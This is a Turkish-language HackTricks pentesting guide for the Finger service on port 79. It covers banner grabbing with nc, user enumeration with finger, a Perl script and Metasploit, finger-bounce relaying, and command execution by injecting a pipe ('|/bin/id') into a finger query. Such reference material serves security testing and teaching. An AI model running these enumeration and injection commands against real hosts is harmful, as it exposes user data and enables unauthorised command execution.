hacktricks/network-services-pentesting/pentesting-finger.md

3.9 KiB
Raw Blame History

79 - Pentesting Finger

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Temel Bilgiler

Finger programı/hizmeti, bilgisayar kullanıcıları hakkında detaylar almak için kullanılır. Genellikle sağlanan bilgiler kullanıcının giriş adı, tam adı ve bazı durumlarda ek detayları içerir. Bu ek detaylar, ofis konumu ve telefon numarasını (varsa), kullanıcının giriş yaptığı zamanı, hareketsizlik süresini (boşta kalma süresi), kullanıcının en son okuduğu e-posta zamanını ve kullanıcının plan ve proje dosyalarının içeriğini kapsayabilir.

Varsayılan port: 79

PORT   STATE SERVICE
79/tcp open  finger

Numaralandırma

Afiş Yakalama/Temel Bağlantı

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Kullanıcı numaralandırma

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternatif olarak, pentestmonkey sitesinden finger-user-enum kullanabilirsiniz, bazı örnekler:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap, varsayılan betikleri kullanarak bir betik çalıştırır

Metasploit, Nmap'tan daha fazla hile kullanır

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Komut yürütme

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Bir sistemi finger relay olarak kullanın

finger user@host@victim
finger @internal@external

{% hint style="success" %} AWS Hacking'i öğrenin ve pratik yapın:HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)
GCP Hacking'i öğrenin ve pratik yapın: HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)

HackTricks'i Destekleyin
{% endhint %}